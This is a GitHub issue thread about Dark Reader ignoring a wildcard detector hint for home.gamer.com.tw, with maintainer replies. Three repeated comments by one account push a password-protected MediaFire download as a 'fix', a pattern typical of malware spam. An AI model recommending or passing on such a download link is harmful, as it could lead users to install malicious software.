### ISSUE TITLE
[Bug] Detector hints are ignored if a hint with domain matched but not really matched exists?

### ISSUE THREAD

**Issue by lumynou5** [darkreader/darkreader#13195]
### Prerequisites

- [X] I [searched for any existing report](https://github.com/darkreader/darkreader/issues?q=is%3Aissue) about this bug to avoid opening a duplicate.
- [X] I can reproduce this bug in a new, unmodified web browser profile with Dark Reader installed as the only extension.
- [X] I understand I need to use the [Broken Website Report template](https://github.com/darkreader/darkreader/issues/new?assignees=&labels=Broken+Website&template=broken-website-report.yml&title=%5BBroken+Website%5D+Replace+with+title) if this bug I am reporting occurs on a single website.

### Bug Description

There are two detector hints: one is a wildcard hint that says how to detect the website dark theme, and the other says a certain path of the website has no dark theme. However, any other path with the same subdomain as the path hint is treated as though it had no dark theme, and the wildcard hint, which really matches the URL, is ignored.

### Website Address

https://home.gamer.com.tw/

### Steps To Reproduce

1. Open the website.
2. Switch to dark theme (it seems a user setting and needs login.)
3. See DarkReader panel reporting no dark theme found.

### Expected Behavior

The dark theme is detected.

### Actual Behavior

The dark theme is not detected.

### Operating System

Windows 10

### Web Browser name and version

Firefox 129.0.2

### Dark Reader version

4.9.89

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Myshor** [comment]
Seems the home was added without loggin in. I will remove the one without wildcard. 😉

**Comment by Myshor** [comment]
As this is not a sitefix it will be changed in next Dark Reader release.

**Comment by lumynou5** [comment]
Thanks.
I wonder if a path rule even works, because it sounds like it is actually equivalent to `home.gamer.com.tw`.
